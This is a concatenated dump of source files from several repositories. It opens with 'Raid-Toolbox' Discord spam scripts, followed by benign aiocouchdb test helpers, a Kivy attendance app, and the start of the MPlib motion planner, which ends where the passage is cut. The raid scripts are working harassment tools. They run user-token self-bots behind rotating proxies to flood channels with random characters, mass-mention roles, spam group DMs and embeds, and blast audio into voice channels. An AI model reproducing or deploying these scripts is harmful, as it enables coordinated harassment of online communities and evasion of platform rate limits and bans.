metadata (dict) | text (string, lengths 60 to 3.49M)
{
"source": "00-00-00-11/Raid-Toolbox",
"score": 2
}
#### File: Raid-Toolbox/spammer/asciispam.py
```python
import discord
import random
import sys
import aiohttp
token = sys.argv[1]
tokenno = sys.argv[2]
textchan = sys.argv[3]
allchan = sys.argv[4]
SERVER = sys.argv[5]
useproxies = sys.argv[6]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
@client.event
async def on_ready():
server = client.get_guild(int(SERVER))
if allchan == 'true':
while not client.is_closed():
for channel in server.text_channels:
myperms = channel.permissions_for(server.get_member(client.user.id))
if not myperms.send_messages:
continue
asc = ''
for x in range(1999):
num = random.randrange(13000)
asc = asc + chr(num)
try:
await channel.send(asc)
except Exception:
pass
else:
txtchan = client.get_channel(int(textchan))
while not client.is_closed():
asc = ''
for x in range(1999):
num = random.randrange(13000)
asc = asc + chr(num)
try:
await txtchan.send(asc)
except Exception:
pass
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/embedspam.py
```python
import discord
import sys
import random
import aiohttp
token = sys.argv[1]
title = sys.argv[2]
author = sys.argv[3]
iconurl = sys.argv[4]
thumburl = sys.argv[5]
footer = sys.argv[6]
textchan = sys.argv[7]
useproxies = sys.argv[8]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
# set embed
embed=discord.Embed(title=title)
embed.set_author(name=author, icon_url=iconurl)
embed.set_thumbnail(url=thumburl)
embed.set_footer(text=footer)
@client.event
async def on_ready():
try:
txtchan = client.get_channel(int(textchan))
while True:
await txtchan.send(embed=embed)
except Exception:
pass
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/friender.py
```python
import sys
import requests
import random
token = sys.argv[1]
userid = sys.argv[2]
useproxies = sys.argv[3]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
def proxyfriend():
try:
proxy = random.choice(proxy_list)
requests.put(apilink, headers=headers, proxies={"http": proxy, "https": proxy})
except Exception:
proxyfriend()
apilink = 'https://discordapp.com/api/v6/users/@me/relationships/'+ str(userid)
headers={
'Authorization': token,
'Content-Type': 'application/json'
}
if useproxies == 'True':
proxyfriend()
else:
requests.put(apilink, headers=headers)
```
#### File: Raid-Toolbox/spammer/groupdmspam.py
```python
import discord
import sys
import random
import aiohttp
import logging
token = sys.argv[1]
group = sys.argv[2]
tokenno = sys.argv[3]
msgtxt = sys.argv[4]
useproxies = sys.argv[5]
logging.basicConfig(filename='RTB.log', filemode='w', format='Token {}'.format(str(tokenno))+' - %(levelname)s - %(message)s',level=logging.CRITICAL)
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
@client.event
async def on_ready():
groupdm = client.get_channel(int(group))
while not client.is_closed():
try:
await groupdm.send(msgtxt)
except Exception:
pass
try:
client.run(token, bot=False)
except Exception as c:
logging.critical('Token {} Unable to login: {}'.format(str(tokenno),str(c)))
print (c)
```
#### File: Raid-Toolbox/spammer/rolemention.py
```python
import discord
import sys
import random
import aiohttp
useproxies = sys.argv[4]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
token = sys.argv[1]
SERVER = sys.argv[2]
tokenno = sys.argv[3]
@client.event
async def on_ready():
server = client.get_guild(int(SERVER))
mention = ''
try:
for role in server.roles:
if role.mentionable:
mention += role.mention + ' '
else:
continue
while not client.is_closed():
for channel in server.text_channels:
myperms = channel.permissions_for(server.get_member(client.user.id))
if not myperms.send_messages:
continue
for m in [mention[i:i+1999] for i in range(0, len(mention), 1999)]:
try:
await channel.send(m)
except Exception:
pass
except Exception as e:
print (e)
pass
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/trafficlight.py
```python
import discord
import asyncio
import random
import sys
import aiohttp
useproxies = sys.argv[2]
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
token = sys.argv[1]
@client.event
async def on_ready():
while not client.is_closed():
randoms = ['1','2','3']
presence = (random.choice(randoms))
if presence == '1':
await client.change_presence(status=discord.Status.online)
await asyncio.sleep(3)
elif presence == '2':
await client.change_presence(status=discord.Status.idle)
await asyncio.sleep(3)
elif presence == '3':
await client.change_presence(status=discord.Status.do_not_disturb)
await asyncio.sleep(3)
try:
client.run(token, bot=False)
except Exception as c:
print (c)
```
#### File: Raid-Toolbox/spammer/vcspam.py
```python
import discord
import asyncio
import sys
import random
import aiohttp
token = sys.argv[1]
tokenno = sys.argv[2]
voice_id = sys.argv[3]
useproxies = sys.argv[4] # proxies for voice chats smh
if useproxies == 'True':
proxy_list = open("proxies.txt").read().splitlines()
proxy = random.choice(proxy_list)
con = aiohttp.ProxyConnector(proxy="http://"+proxy)
client = discord.Client(connector=con)
else:
client = discord.Client()
@client.event
async def on_ready():
await asyncio.sleep(1)
voice_channel = client.get_channel(int(voice_id))
while not client.is_closed():
vc = await voice_channel.connect()
vc.play(discord.FFmpegPCMAudio('spammer/file.wav'))
vc.source = discord.PCMVolumeTransformer(vc.source)
vc.source.volume = 10.0
while vc.is_playing():
await asyncio.sleep(3)
await vc.disconnect(force=True)
try:
client.run(token, bot=False)
except Exception as c:
print(c)
```
{
"source": "00000111/aiocouchdb",
"score": 2
}
#### File: aiocouchdb/tests/utils.py
```python
import asyncio
import base64
import contextlib
import datetime
import functools
import os
import random
import unittest
import unittest.mock as mock
import uuid as _uuid
from collections import deque, defaultdict
import aiocouchdb.client
import aiocouchdb.errors
from aiocouchdb.client import urljoin, extract_credentials
from yarl import URL
TARGET = os.environ.get('AIOCOUCHDB_TARGET', 'mock')
def run_in_loop(f):
@functools.wraps(f)
def wrapper(testcase, *args, **kwargs):
coro = asyncio.coroutine(f)
future = asyncio.wait_for(coro(testcase, *args, **kwargs),
timeout=testcase.timeout)
return testcase.loop.run_until_complete(future)
return wrapper
class MetaAioTestCase(type):
def __new__(cls, name, bases, attrs):
for key, obj in attrs.items():
if key.startswith('test_'):
attrs[key] = run_in_loop(obj)
return super().__new__(cls, name, bases, attrs)
class TestCase(unittest.TestCase, metaclass=MetaAioTestCase):
_test_target = TARGET
timeout = 10
url = URL('http://localhost:5984')
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
wraps = None
if self._test_target != 'mock':
wraps = self._request_tracer(aiocouchdb.client.request)
self._patch = mock.patch('aiocouchdb.client.request', wraps=wraps)
self.request = self._patch.start()
self._set_response(self.prepare_response())
self._req_per_task = defaultdict(list)
self.loop.run_until_complete(self.setup_env())
def tearDown(self):
self.loop.run_until_complete(self.teardown_env())
self._patch.stop()
self.loop.close()
@asyncio.coroutine
def setup_env(self):
sup = super()
if hasattr(sup, 'setup_env'):
yield from sup.setup_env()
@asyncio.coroutine
def teardown_env(self):
sup = super()
if hasattr(sup, 'teardown_env'):
yield from sup.teardown_env()
def future(self, obj):
fut = asyncio.Future(loop=self.loop)
fut.set_result(obj)
return fut
def _request_tracer(self, f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
current_task = asyncio.Task.current_task(loop=self.loop)
self._req_per_task[current_task].append((args, kwargs))
return f(*args, **kwargs)
return wrapper
def prepare_response(self, *,
cookies=None,
data=b'',
err=None,
headers=None,
status=200):
def make_side_effect(queue):
def side_effect(*args, **kwargs):
fut = asyncio.Future(loop=self.loop)
if queue:
resp.content.at_eof.return_value = False
fut.set_result(queue.popleft())
elif err:
fut.set_exception(err)
else:
resp.content.at_eof.return_value = True
fut.set_result(b'')
return fut
return side_effect
headers = headers or {}
headers.setdefault('CONTENT-TYPE', 'application/json')
cookies = cookies or {}
if isinstance(data, list):
chunks_queue = deque(data)
lines_queue = deque((b''.join(data)).splitlines(keepends=True))
else:
chunks_queue = deque([data])
lines_queue = deque(data.splitlines(keepends=True))
resp = aiocouchdb.client.HttpResponse('', '')
resp._post_init(self.loop)
resp.status = status
resp.headers = headers
resp.cookies = cookies
resp.content = unittest.mock.Mock()
resp.content._buffer = bytearray()
resp.content.at_eof.return_value = False
resp.content.read.side_effect = make_side_effect(chunks_queue)
resp.content.readany.side_effect = make_side_effect(chunks_queue)
resp.content.readline.side_effect = make_side_effect(lines_queue)
resp.close = mock.Mock(side_effect=resp.close)
return resp
@contextlib.contextmanager
def response(self, *,
cookies=None,
data=b'',
err=None,
headers=None,
status=200):
resp = self.prepare_response(cookies=cookies,
data=data,
err=err,
headers=headers,
status=status)
self._set_response(resp)
yield resp
resp.close()
self._set_response(self.prepare_response())
def _set_response(self, resp):
if self._test_target == 'mock':
self.request.return_value = self.future(resp)
def assert_request_called_with(self, method, *path, **kwargs):
self.assertTrue(self.request.called and self.request.call_count >= 1)
current_task = asyncio.Task.current_task(loop=self.loop)
if current_task in self._req_per_task:
call_args, call_kwargs = self._req_per_task[current_task][-1]
else:
call_args, call_kwargs = self.request.call_args
self.assertEqual((method, urljoin(self.url, *path)), call_args)
kwargs.setdefault('data', None)
kwargs.setdefault('headers', {})
kwargs.setdefault('params', {})
for key, value in kwargs.items():
self.assertIn(key, call_kwargs)
if value is not Ellipsis:
self.assertEqual(value, call_kwargs[key])
class ServerTestCase(TestCase):
server_class = None
url = os.environ.get('AIOCOUCHDB_URL', 'http://localhost:5984')
@asyncio.coroutine
def setup_env(self):
self.url, creds = extract_credentials(self.url)
self.server = self.server_class(self.url, loop=self.loop)
if creds is not None:
self.cookie = yield from self.server.session.open(*creds)
else:
self.cookie = None
sup = super()
if hasattr(sup, 'setup_env'):
yield from sup.setup_env()
@asyncio.coroutine
def teardown_env(self):
sup = super()
if hasattr(sup, 'teardown_env'):
yield from sup.teardown_env()
class DatabaseTestCase(ServerTestCase):
database_class = None
def new_dbname(self):
return dbname(self.id().split('.')[-1])
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
dbname = self.new_dbname()
self.url_db = urljoin(self.url, dbname)
self.db = self.database_class(
self.url_db, dbname=dbname, loop=self.loop)
yield from self.setup_database(self.db)
@asyncio.coroutine
def setup_database(self, db):
with self.response(data=b'{"ok": true}'):
yield from db.create()
@asyncio.coroutine
def teardown_env(self):
yield from self.teardown_database(self.db)
yield from super().teardown_env()
@asyncio.coroutine
def teardown_database(self, db):
with self.response(data=b'{"ok": true}'):
try:
yield from db.delete()
except aiocouchdb.errors.ResourceNotFound:
pass
class DocumentTestCase(DatabaseTestCase):
document_class = None
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
docid = uuid()
self.url_doc = urljoin(self.db.resource.url, docid)
self.doc = self.document_class(
self.url_doc, docid=docid, loop=self.loop)
yield from self.setup_document(self.doc)
@asyncio.coroutine
def setup_document(self, doc):
with self.response(data=b'{"rev": "1-ABC"}'):
resp = yield from doc.update({})
self.rev = resp['rev']
class DesignDocumentTestCase(DatabaseTestCase):
designdoc_class = None
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
docid = '_design/' + uuid()
self.url_ddoc = urljoin(self.db.resource.url, *docid.split('/'))
self.ddoc = self.designdoc_class(
self.url_ddoc, docid=docid, loop=self.loop)
yield from self.setup_document(self.ddoc)
@asyncio.coroutine
def setup_document(self, ddoc):
with self.response(data=b'{"rev": "1-ABC"}'):
resp = yield from ddoc.doc.update({
'views': {
'viewname': {
'map': 'function(doc){ emit(doc._id, null) }'
}
}
})
self.rev = resp['rev']
class AttachmentTestCase(DocumentTestCase):
attachment_class = None
@asyncio.coroutine
def setup_env(self):
yield from super().setup_env()
self.attbin = self.attachment_class(
urljoin(self.doc.resource.url, 'binary'),
name='binary')
self.atttxt = self.attachment_class(
urljoin(self.doc.resource.url, 'text'),
name='text')
self.url_att = self.attbin.resource.url
@asyncio.coroutine
def setup_document(self, doc):
with self.response(data=b'{"rev": "1-ABC"}'):
resp = yield from doc.update({
'_attachments': {
'binary': {
'data': base64.b64encode(b'Time to relax!').decode(),
'content_type': 'application/octet-stream'
},
'text': {
'data': base64.b64encode(b'Time to relax!').decode(),
'content_type': 'text/plain'
}
}
})
self.rev = resp['rev']
def modify_server(section, option, value):
assert section != 'admins', 'use `with_fixed_admin_party` decorator'
@asyncio.coroutine
def apply_config_changes(server, cookie):
oldval = yield from server.config.update(section, option, value,
auth=cookie)
return oldval
@asyncio.coroutine
def revert_config_changes(server, cookie, oldval):
if not oldval:
try:
yield from server.config.delete(section, option, auth=cookie)
except aiocouchdb.errors.ResourceNotFound:
pass
else:
if not (yield from server.config.exists(section, option)):
return
oldval = yield from server.config.update(section, option, oldval,
auth=cookie)
assert oldval == value, ('{} != {}'.format(oldval, value))
def decorator(f):
@functools.wraps(f)
def wrapper(testcase, **kwargs):
server, cookie = testcase.server, testcase.cookie
oldval = yield from apply_config_changes(server, cookie)
try:
yield from f(testcase, **kwargs)
finally:
yield from revert_config_changes(server, cookie, oldval)
return wrapper
return decorator
def with_fixed_admin_party(username, password):
@asyncio.coroutine
def apply_config_changes(server, cookie):
oldval = yield from server.config.update('admins', username, password,
auth=cookie)
cookie = yield from server.session.open(username, password)
return oldval, cookie
@asyncio.coroutine
def revert_config_changes(server, cookie, oldval):
if not oldval:
try:
yield from server.config.delete('admins', username, auth=cookie)
except aiocouchdb.errors.ResourceNotFound:
pass
else:
yield from server.config.update('admins', username, oldval,
auth=cookie)
def decorator(f):
@functools.wraps(f)
def wrapper(testcase, **kwargs):
server, cookie = testcase.server, testcase.cookie
oldval, cookie = yield from apply_config_changes(server, cookie)
if cookie is not None:
kwargs[username] = cookie
try:
yield from f(testcase, **kwargs)
finally:
yield from revert_config_changes(server, cookie, oldval)
return wrapper
return decorator
def using_database(dbarg='db'):
@asyncio.coroutine
def create_database(server, cookie):
db = server[dbname()]
yield from db.create(auth=cookie)
return db
@asyncio.coroutine
def drop_database(db, cookie):
try:
yield from db.delete(auth=cookie)
except aiocouchdb.errors.ResourceNotFound:
pass
def decorator(f):
@functools.wraps(f)
def wrapper(testcase, **kwargs):
server, cookie = testcase.server, testcase.cookie
with testcase.response(data=b'{"ok": true}'):
db = yield from create_database(server, cookie)
assert dbarg not in kwargs, \
'conflict: both {} and {} are referenced as {}'.format(
db, kwargs[dbarg], dbarg
)
kwargs[dbarg] = db
try:
yield from f(testcase, **kwargs)
finally:
with testcase.response(data=b'{"ok": true}'):
yield from drop_database(db, cookie)
return wrapper
return decorator
@asyncio.coroutine
def populate_database(db, docs_count):
def generate_docs(count):
for _ in range(count):
dt = datetime.datetime.fromtimestamp(
random.randint(1234567890, 2345678901)
)
dta = [dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second]
doc = {
'_id': uuid(),
'created_at': dta,
'num': random.randint(0, 10),
'type': random.choice(['a', 'b', 'c'])
}
yield doc
if not (yield from db.exists()):
yield from db.create()
docs = list(generate_docs(docs_count))
updates = yield from db.bulk_docs(docs)
mapping = {doc['_id']: doc for doc in docs}
if not updates:
return {}
for update in updates:
mapping[update['id']]['_rev'] = update['rev']
return mapping
def uuid():
return _uuid.uuid4().hex
def dbname(idx=None, prefix='test/aiocouchdb'):
if idx:
return '/'.join((prefix, idx, uuid()))
else:
return '/'.join((prefix, uuid()))
def run_for(*targets):
def decorator(f):
@functools.wraps(f)
@unittest.skipIf(TARGET not in targets,
'runs only for targets: %s' % ', '.join(targets))
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
return wrapper
return decorator
def skip_for(*targets):
def decorator(f):
@functools.wraps(f)
@unittest.skipIf(TARGET in targets,
'skips for targets: %s' % ', '.join(targets))
def wrapper(*args, **kwargs):
return f(*args, **kwargs)
return wrapper
return decorator
```
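The pieces above combine as in the hedged sketch below (not part of the original test suite): with the default mock target, `setUp` patches `aiocouchdb.client.request`, the `response()` context manager swaps in a prepared response, and `MetaAioTestCase`/`run_in_loop` let the test body use `yield from` directly. The import path and test names are assumptions for illustration.
```python
# Hypothetical test module; assumes AIOCOUCHDB_TARGET is unset (mock target).
import aiocouchdb.client
from aiocouchdb.tests.utils import TestCase  # the TestCase defined above


class MockedRequestTestCase(TestCase):

    def test_request_returns_prepared_response(self):
        # MetaAioTestCase wrapped this generator with run_in_loop, so the
        # `yield from` below runs on self.loop with the class-level timeout.
        with self.response(data=b'{"ok": true}', status=201) as resp:
            result = yield from aiocouchdb.client.request('PUT', self.url)
        self.assertIs(resp, result)
        self.assertEqual(201, result.status)
        self.assertTrue(self.request.called)
```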
{
"source": "0000Blaze/Smart-Attendance",
"score": 2
}
#### File: Smart-Attendance/teacherApp/teacher.py
```python
from server import client_teacher
from numpy import spacing
from kivymd.app import MDApp
from kivymd.uix.boxlayout import MDBoxLayout
from kivymd.uix.button import MDRaisedButton
from kivymd.uix.label import MDLabel
from kivy.uix.image import Image
from kivymd.uix.textfield import MDTextField
from kivymd.uix.datatables import MDDataTable
from kivy.metrics import dp
from kivy.uix.screenmanager import ScreenManager, Screen
class LoginWindow(Screen):
pass
class AttendanceWindow(Screen):
pass
cardColor = [0.796875, 0.8984375, 0.99609375, 1]
textColor = [0, 0, 0, 1]
backgroundColor = [0.59765625, 0.8046875, 0.99609375, 1]
sm = ScreenManager()
sm.add_widget(LoginWindow(name="login"))
sm.add_widget(AttendanceWindow(name="attendance"))
class MainApp(MDApp):
teacherId = ""
classId = ""
className = ""
classList = []
subjectId = ""
subjectname = ""
subjectList = []
attendanceId = ""
attendanceList = {}
attendanceToBeDone = []
attendanceListMini = []
data_tables = None
stop_btn = None
present_btn = None
def __init__(self, **kwargs):
self.title = "Smart Attendance"
super().__init__(**kwargs)
def build(self):
loginBg = MDBoxLayout()
loginBg.md_bg_color = backgroundColor
imageLayout = MDBoxLayout(size_hint=(0.15, 0.15),
pos_hint={'center_x': .5, 'center_y': .9})
imageObj = Image(source="./assets/icon.png")
imageLayout.add_widget(imageObj)
smallCard = MDBoxLayout()
smallCard.md_bg_color = cardColor
smallCard.size_hint = (0.5, 0.65)
smallCard.radius = [40, 40, 40, 40]
smallCard.orientation = "vertical"
smallCard.pos_hint = {'center_x': .5, 'center_y': .5}
teacherIDBox = MDBoxLayout()
teacherIDBox.pos_hint = {'center_x': .5, 'center_y': .5}
teacherIDBox.orientation = 'vertical'
teacherIDBox.adaptive_height = True
teacherIDBox.size_hint = (0.5, 1.0)
self.teacherIDInp = MDTextField(hint_text="Teacher Id:")
self.teacherIDInp.color_mode = "custom"
self.teacherIDInp.line_color_normal = textColor
self.teacherIDInp.line_color_focus = textColor
self.teacherIDInp.hint_text_color = textColor
self.teacherIDInp.pos_hint = {'center_x': .5, 'center_y': .2}
self.classIDInp = MDTextField(hint_text="Class Id:")
self.classIDInp.hint_text = "Class Id:"
self.classIDInp.color_mode = "custom"
self.classIDInp.line_color_normal = textColor
self.classIDInp.line_color_focus = textColor
self.classIDInp.hint_text_color = textColor
self.classIDInp.pos_hint = {'center_x': .5, 'center_y': .2}
teacherIDLabel = MDLabel(text="Teacher Id:")
teacherIDLabel.size_hint = (1, 0.2)
classIDLabel = MDLabel(text="Class Id:")
classIDLabel.size_hint = (1, 0.2)
teacherIDBox.add_widget(teacherIDLabel)
teacherIDBox.add_widget(self.teacherIDInp)
teacherIDBox.add_widget(classIDLabel)
teacherIDBox.add_widget(self.classIDInp)
connectButton = MDRaisedButton(text="Connect")
connectButton.pos_hint = {'center_x': .5, 'center_y': .5}
connectButton.bind(on_press=self.connectCallback)
subjectNameLayout = MDBoxLayout(orientation="vertical")
subjectNameLayout.pos_hint = {'center_x': .5, 'center_y': .5}
subjectNameLayout.size_hint = (0.65, 0.5)
subjectNameLayout.adaptive_height = True
self.teacherName = MDLabel(pos_hint={'center_x': .5, 'center_y': .5})
self.teacherName.text = ""
self.subjectName = MDLabel(pos_hint={'center_x': .5, 'center_y': .5})
self.subjectName.text = "No Connection"
subjectNameLayout.add_widget(self.teacherName)
subjectNameLayout.add_widget(self.subjectName)
startButton = MDRaisedButton(text="Start")
startButton.pos_hint = {'center_x': .5, 'center_y': .5}
startButton.bind(on_release=self.startCallback)
smallCard.add_widget(teacherIDBox)
smallCard.add_widget(connectButton)
smallCard.add_widget(subjectNameLayout)
smallCard.add_widget(startButton)
smallCard.add_widget(MDLabel(size_hint=(1, 0.2)))
loginScreen = sm.get_screen("login")
loginScreen.add_widget(loginBg)
loginScreen.add_widget(imageLayout)
loginScreen.add_widget(smallCard)
###########################################################################
attendanceBg = MDBoxLayout()
attendanceBg.md_bg_color = backgroundColor
attendanceBox = MDBoxLayout(orientation="vertical")
attendanceBox.pos_hint = {"center_x": .5, "center_y": .9}
attendanceBox.size_hint = (0.9, 0.2)
# attendanceBox.adaptive_height = True
# attendanceBox = MDBoxLayout(spacing="40dp")
# attendanceBox.md_bg_color = [1, 0, 0, 1]
attendanceInnerBox1 = MDBoxLayout(orientation="horizontal")
attendanceInnerBox1.size_hint = (1, 0.5)
self.attendanceTextLabel = MDLabel(
text="Attendance will time out in 10 minutes")
backButton = MDRaisedButton(text="Back")
backButton.bind(on_press=self.backCallback)
attendanceInnerBox2 = MDBoxLayout(orientation="horizontal")
attendanceInnerBox2.size_hint = (1, 0.5)
self.attendanceCodeLabel = MDLabel(text="Attendance Code :")
refreshButton = MDRaisedButton(text="Refresh")
refreshButton.bind(on_press=self.refreshCallback)
attendanceInnerBox1.add_widget(self.attendanceTextLabel)
attendanceInnerBox1.add_widget(backButton)
attendanceInnerBox2.add_widget(self.attendanceCodeLabel)
attendanceInnerBox2.add_widget(refreshButton)
attendanceBox.add_widget(attendanceInnerBox1)
attendanceBox.add_widget(attendanceInnerBox2)
# stopAttendanceButton = MDRaisedButton(text="Stop Attendance")
# stopAttendanceButton.bind(on_press=self.stopAttendanceCallback)
attendanceScreen = sm.get_screen("attendance")
attendanceScreen.add_widget(attendanceBg)
attendanceScreen.add_widget(attendanceBox)
# attendanceScreen.add_widget(stopAttendanceButton)
return sm
def getSubject(self):
try:
subjectListFromServer = client_teacher.updateClassAndSubjects(
self.teacherId)
            # # get subject list of each class taught by the teacher
# for i in subjectListFromServer["subject"]:
# self.subjectList.append(i)
# print(subjectList)
if "error" not in subjectListFromServer:
# print(subjectListFromServer["teacher_name"])
self.subjectId = subjectListFromServer["subject"][0][0]
self.subjectname = subjectListFromServer["subject"][0][1]
self.teacherName.text = str(
"Welcome, ") + str(subjectListFromServer["teacher_name"])
# print(self.subjectId)
except Exception as e:
print("Subject retrival error", e)
pass
def startAttendanceSheet(self):
try:
AttendanceListFromServer = client_teacher.startAttendance(
self.teacherId, self.classId, self.subjectId)
print(self.teacherId, self.classId, self.subjectId)
if "error" in AttendanceListFromServer:
print(AttendanceListFromServer["error"])
self.attendanceTextLabel.text = AttendanceListFromServer["error"]
else:
# save attendance code
self.attendanceId = AttendanceListFromServer["acode"]
for list in AttendanceListFromServer["student_list"]:
#print(list[0], list[1])
presence = "Absent"
presenceList = [list[1], presence]
self.attendanceList[list[0]] = presenceList
print(AttendanceListFromServer["timeout"])
self.attendanceTextLabel.text = AttendanceListFromServer["timeout"]
except Exception as e:
print("error :", e)
def updateAttendanceSheet(self):
try:
AttendanceListFromServer = client_teacher.getAttendance(
self.teacherId, self.classId)
if "error" in AttendanceListFromServer:
print(AttendanceListFromServer["error"])
else:
# update presence in list
keys = AttendanceListFromServer["student_list"]
# print(keys)
for key in keys:
self.attendanceList[key][1] = "Present"
self.widgetRemover() # removes old instance of datatable,stop and present button
attendanceScreen = sm.get_screen("attendance")
# adds data table , stop and present button
self.load_table(attendanceScreen)
except Exception as e:
print(e)
def finalAttendanceSheet(self, *args):
try:
AttendanceListFromServer = client_teacher.stopAttendance(
self.teacherId, self.classId)
if "error" in AttendanceListFromServer:
print(AttendanceListFromServer["error"])
self.attendanceTextLabel.text = AttendanceListFromServer["error"]
else:
print(AttendanceListFromServer["success"])
self.attendanceTextLabel.text = AttendanceListFromServer["success"]
except Exception as e:
print(e)
def manualPresent(self, *args):
try:
for text in self.attendanceToBeDone:
print("Done presence", text)
client_teacher.markAttendance(
self.teacherId, self.classId, text)
except:
print("some error occured during manual attendance")
        # clear the roll numbers that were checked for manual presence
while len(self.attendanceToBeDone) > 0:
self.attendanceToBeDone.pop()
# print("After",self.attendanceToBeDone)
self.updateAttendanceSheet()
def startCallback(self, *args):
self.startAttendanceSheet()
self.attendanceCodeLabel.text = "Attendance Code: " + \
str(self.attendanceId)
sm.current = "attendance"
attendanceScreen = sm.get_screen("attendance")
self.load_table(attendanceScreen)
def connectCallback(self, *args):
self.classIDInp.text = self.classIDInp.text.upper()
self.teacherId = self.teacherIDInp.text
self.classId = self.classIDInp.text
self.getSubject()
# print("searching subject for", self.teacherID, self.classID)
self.subjectName.text = str(self.subjectname)
def stopAttendanceCallback(self, *args):
self.finalAttendanceSheet()
self.attendanceCodeLabel.text = "Attendance Code: "
pass
def backCallback(self, *args):
sm.current = "login"
def refreshCallback(self, *args):
self.updateAttendanceSheet()
self.widgetRemover()
aScreen = sm.get_screen("attendance")
self.load_table(aScreen)
def stopCallback(self, *args):
self.finalAttendanceSheet()
pass
def presentCallback(self, *args):
self.manualPresent()
attendanceScreen = sm.get_screen("attendance")
self.widgetRemover()
self.load_table(attendanceScreen)
pass
def load_table(self, aScreen):
        # flatten the attendance dict into a list for the initial data table insert
AttendListMini = []
for key in self.attendanceList:
AttendListMini.append(key)
AttendListMini.append(self.attendanceList[key][0])
AttendListMini.append(self.attendanceList[key][1])
self.data_tables = MDDataTable(
pos_hint={'center_y': 0.5, 'center_x': 0.5},
size_hint=(0.7, 0.6),
rows_num=48,
check=True,
# use_pagination=True,
column_data=[
("Roll Number", dp(40)),
("Student", dp(30)),
("Presence", dp(30)), ],
row_data=[
(AttendListMini[i*3], AttendListMini[(i*3)+1],
AttendListMini[(i*3)+2])
for i in range(int(len(AttendListMini)/3))
# (f"{i + 1}", "2.23", "3.65")
# for i in range(50)
],
)
self.data_tables.bind(on_check_press=self.check_press)
self.stop_btn = MDRaisedButton(
text="Stop",
pos_hint={'center_y': 0.1, 'center_x': 0.6}
)
self.stop_btn.bind(on_press=self.stopCallback)
self.present_btn = MDRaisedButton(
text="Mark Present",
pos_hint={'center_y': 0.1, 'center_x': 0.3}
)
self.present_btn.bind(on_press=self.presentCallback)
aScreen.add_widget(self.data_tables)
aScreen.add_widget(self.stop_btn)
aScreen.add_widget(self.present_btn)
# return layout
def check_press(self, instance_table, current_row):
print(current_row)
self.attendanceToBeDone.append(current_row[0])
def widgetRemover(self):
attendanceScreen = sm.get_screen("attendance")
attendanceScreen.remove_widget(self.data_tables)
attendanceScreen.remove_widget(self.stop_btn)
attendanceScreen.remove_widget(self.present_btn)
# attendanceScreen.clear_widgets()
# attendanceScreen.add_widget(MDLabel(text="hi ravi"))
if __name__ == "__main__":
MainApp().run()
```
{
"source": "0000duck/MPlib",
"score": 3
}
#### File: MPlib/mplib/planner.py
```python
from typing import Sequence, Tuple, Union
import os
import numpy as np
from transforms3d.quaternions import quat2mat
import toppra
import toppra as ta
import toppra.constraint as constraint
import toppra.algorithm as algo
from .pymp import *
class Planner:
"""Motion planner."""
# TODO(jigu): default joint vel and acc limits
    # TODO(jigu): how are user link names and joint names exactly used?
def __init__(
self,
urdf: str,
user_link_names: Sequence[str],
user_joint_names: Sequence[str],
move_group: str,
joint_vel_limits: Union[Sequence[float], np.ndarray],
joint_acc_limits: Union[Sequence[float], np.ndarray],
srdf: str = ""
):
r"""Motion planner for robots.
Args:
urdf: Unified Robot Description Format file.
user_link_names: names of links, the order
user_joint_names: names of the joints to plan
move_group: target link to move, usually the end-effector.
joint_vel_limits: maximum joint velocities for time parameterization,
which should have the same length as
joint_acc_limits: maximum joint accelerations for time parameterization,
which should have the same length as
srdf: Semantic Robot Description Format file.
References:
http://docs.ros.org/en/kinetic/api/moveit_tutorials/html/doc/urdf_srdf/urdf_srdf_tutorial.html
"""
self.urdf = urdf
if srdf == "" and os.path.exists(urdf.replace(".urdf", ".srdf")):
srdf = urdf.replace(".urdf", ".srdf")
print("No SRDF file provided. Try to load %s." % srdf)
self.srdf = srdf
self.user_link_names = user_link_names
self.user_joint_names = user_joint_names
self.joint_name_2_idx = {}
for i, joint in enumerate(self.user_joint_names):
self.joint_name_2_idx[joint] = i
self.link_name_2_idx = {}
for i, link in enumerate(self.user_link_names):
self.link_name_2_idx[link] = i
self.robot = articulation.ArticulatedModel(
urdf,
srdf,
[0, 0, -9.81],
self.user_joint_names,
self.user_link_names,
verbose=False,
convex=True,
)
self.pinocchio_model = self.robot.get_pinocchio_model()
self.planning_world = planning_world.PlanningWorld(
[self.robot], ["robot"], [], []
)
if srdf == "":
self.generate_collision_pair()
self.robot.update_SRDF(self.srdf)
assert(move_group in self.user_link_names)
self.move_group = move_group
self.robot.set_move_group(self.move_group)
self.move_group_joint_indices = (
self.robot.get_move_group_joint_indices()
)
self.joint_types = self.pinocchio_model.get_joint_types()
self.joint_limits = np.concatenate(
self.pinocchio_model.get_joint_limits()
)
self.planner = ompl.OMPLPlanner(world=self.planning_world)
self.joint_vel_limits = joint_vel_limits
self.joint_acc_limits = joint_acc_limits
self.move_group_link_id = self.link_name_2_idx[self.move_group]
assert len(self.joint_vel_limits) == len(
self.move_group_joint_indices
